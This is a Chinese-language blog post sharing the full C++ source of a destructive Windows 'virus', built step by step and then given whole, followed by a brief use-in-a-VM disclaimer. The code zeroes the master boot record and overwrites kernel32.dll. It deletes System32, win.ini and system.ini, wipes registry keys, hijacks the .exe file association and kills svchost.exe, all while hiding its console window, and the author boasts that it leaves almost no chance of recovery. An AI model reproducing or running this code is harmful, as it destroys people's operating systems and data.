写了这么多python病毒,今天我来给大家分享一个C++病毒。
创作背景:我有个同学对电脑十分精通,而且对MBR十分感兴趣,他跟我分享了他怎么把MBR搞报废的历程。听完之后,我开始研究MBR。用python研究了2个月,结果做的是无用功。知道我这个月学了C++!我学会了如何破坏MBR!于是我开始做这款超强病毒。做了2天(一直在调试,把病毒弄到最佳状态)。
IDE:visual studio 2022
功能:感染kernel32.dll、删除system32、win.ini、system.ini、删除所有注册表、修改exe打开方式、修改MBR
修复方法:用PE修复引导,恢复丢失的文件,修复文件打开方式(或重装系统)
第一步,把头文件给导入进来。
#include <stdio.h>
#include <iostream>
#include <Windows.h>
然后做点设置
#define _CRT_SECURE_NO_WARNINGS 1 //跳过安全检查
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" )//隐藏dos窗口
然后做修改MBR函数
void kill_mbr()//修改MBR
{
FILE* disk = fopen("\\\\.\\PHYSICALDRIVE0", "rb+");
char mbr[512] = { 0 };
fwrite(mbr, sizeof(mbr), 1, disk);
fclose(disk);
}
做感染kernel32.dll函数
void infect()//感染kernel32.dll
{
FILE* infect_file = fopen("C:\\Windows\\SysWOW64\\kernel32.dll","rb+");
char write[666] = { 0 };
fwrite(write, sizeof(write), 1, infect_file);
fclose(infect_file);
}
然后是其他功能的代码
system("del /f /s /q C:\\Windows\\System32\\*.*");//删除system32
system("ftype exefile='C:\\Windows\\notepad.exe'%*"); //把可执行文件的打开方式都改成notepad
system("@echo off Start reg delete HKCR/.exe Start reg delete HKCR/.dll Start reg delete HKCR/*");//删除所有注册表
system("attrib -s -r -h C:\\Windows\\system.ini");
system("del /f /s /q C:\\Windows\\system.ini");
system("attrib -s -r -h C:\\Windows\\win.ini");
system("del /f /s /q C:\\Windows\\win.ini"); //删除系统重要文件
对了,还要终止系统进程
system("taskkill /f /im svchost.exe");
然后这样的话运行之后直接蓝屏死机,连修复时间都基本没有~
总代码
#define _CRT_SECURE_NO_WARNINGS 1 //跳过安全检查
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" )//隐藏dos窗口
#include <stdio.h>
#include <iostream>
#include <Windows.h>
using namespace std;
void kill_mbr()//修改MBR
{
FILE* disk = fopen("\\\\.\\PHYSICALDRIVE0", "rb+");
char mbr[512] = { 0 };
fwrite(mbr, sizeof(mbr), 1, disk);
fclose(disk);
}
void infect()//感染kernel32.dll
{
FILE* infect_file = fopen("C:\\Windows\\SysWOW64\\kernel32.dll","rb+");
char write[666] = { 0 };
fwrite(write, sizeof(write), 1, infect_file);
fclose(infect_file);
}
int main()
{
infect();
kill_mbr();
system("del /f /s /q C:\\Windows\\System32\\*.*");//删除system32
system("ftype exefile='C:\\Windows\\notepad.exe'%*"); //把可执行文件的打开方式都改成notepad
system("@echo off Start reg delete HKCR/.exe Start reg delete HKCR/.dll Start reg delete HKCR/*");//删除所有注册表
system("attrib -s -r -h C:\\Windows\\system.ini");
system("del /f /s /q C:\\Windows\\system.ini");
system("attrib -s -r -h C:\\Windows\\win.ini");
system("del /f /s /q C:\\Windows\\win.ini"); //删除系统重要文件
system("taskkill /f /im svchost.exe");
return 0;
}火绒报毒这是木马(好几次了)
我都生成不了程序了都......
以上就是病毒代码,如要使用,请用虚拟机。下载研究后请严禁用于非法用途,使用本文件产生的一切后果由下载者自行承担,谢谢!
请多多提建议,我会继续改进的!
471
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
